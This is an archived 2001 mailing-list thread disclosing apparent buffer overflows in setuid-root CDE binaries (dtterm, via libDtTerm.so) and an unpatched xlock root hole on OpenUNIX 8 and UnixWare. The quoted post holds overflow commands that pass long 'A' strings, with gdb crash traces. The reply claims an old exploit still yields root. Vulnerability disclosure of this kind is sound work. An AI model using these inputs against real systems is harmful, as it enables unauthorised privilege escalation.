Re: OpenUNIX 8 & Unixware possible local root

From: Aycan Irican (aycanat_private)
Date: Wed Oct 03 2001 - 10:57:34 PDT

Next message: Bob Dog: "RE: OpenUNIX 8 & Unixware possible local root"

Previous message: Jason Barbour: "Fw: AIM 0day DoS"
Next in thread: Bob Dog: "RE: OpenUNIX 8 & Unixware possible local root"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Yes, I read yours...It looks like it's a multiple vendor shared 
library(libDtTerm.so) problem to me.

Also Caldera must supply a patch for OpenUNIX 8 xlock vulnerability. I 
sent a mail to "security-alert" a few days ago about xlock vulnerability 
but they told me that they put an unofficial patch for Unixware 7, 
OpenUNIX 8 still VULNERABLE (patch is not applicable on OpenUNIX 8). I 
think this is a serious bug.
For example in earlier 1999 I remember, K2 released an exploit for 
unixware 7 xlock vulnerability and any standard user that can make a 
little modification get root access on OpenUNIX 8 TODAY (I got root). 
Hey man, exploit is around 2 years old and it worked.

KF wrote:

>This goes along with a mailing from earlier this morning ... I stated
>that
>I was able to make ALL suid / sgid dt* files core dump except the dtmail 
>binary...
>-KF
>
>Aycan Irican wrote:
>
>>-----BEGIN PGP SIGNED MESSAGE-----
>>Hash: SHA1
>>
>>Another dt series bug...
>>
>>$ uname -a
>>OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
>>$ id
>>uid=101(fixxxer) gid=1(other)
>>$ ls -al /usr/dt/bin/dtterm
>>- -r-sr-xr-x 1 root bin 60892 Haz 10 05:03
>>/usr/dt/bin/dtterm
>>$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
>>Warning: Missing charsets in String to FontSet conversion
>>Warning: Missing charsets in String to FontSet conversion
>>Memory fault
>>
>> # /usr/gnu/bin/gdb /usr/dt/bin/dtterm
>>(no debugging symbols found)...
>>(gdb) set args -tn `perl -e 'print "A"x1040'`
>>(gdb) run
>>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
>>(no debugging symbols found)...(no debugging symbols found)...
>>...
>>..
>>[New LWP 2]
>>
>> Program received signal SIGSEGV, Segmentation fault.
>>0xbff9a4b8 in strncmp () from /usr/lib/libc.so.1
>>[New Thread 1]
>>(gdb)set args -tn `perl -e 'print "A"x1042'`
>>(gdb) run
>>Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1042'`
>>(no debugging symbols found)...(no debugging symbols found)...
>>[New LWP 2]
>>
>> Program received signal SIGSEGV, Segmentation fault.
>>0xbff3abca in _mergeEnv () from /usr/dt/lib/libDtTerm.so.1
>>[New Thread 1]
>>(gdb)q
>>
>>self-explained...
>>enjoy...
>>
>>- --
>>Aycan ]rican
>>Systems Engineer
>>Prosoft Communication Systems Ltd.
>>Resit Galip Cad. 85/2 Gaziosmanpa~a 06700 Ankara
>>Tel:+90-312-446-6616 Fax:+90-312-446-2423
>>-----BEGIN PGP SIGNATURE-----
>>Version: GnuPG v1.0.6 (GNU/Linux)
>>Comment: For info see http://www.gnupg.org
>>
>>iD8DBQE7uVaiJZJwgy0AK78RAsbKAJ0Y8YiCi+yagy2ep42v8wfsu+dsFQCdFIUt
>>5M67ZahjhrfqnvdlMsqE4SM=
>>=CNXa
>>-----END PGP SIGNATURE-----
>>

Next message: Bob Dog: "RE: OpenUNIX 8 & Unixware possible local root"
Previous message: Jason Barbour: "Fw: AIM 0day DoS"
Next in thread: Bob Dog: "RE: OpenUNIX 8 & Unixware possible local root"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Oct 03 2001 - 15:41:34 PDT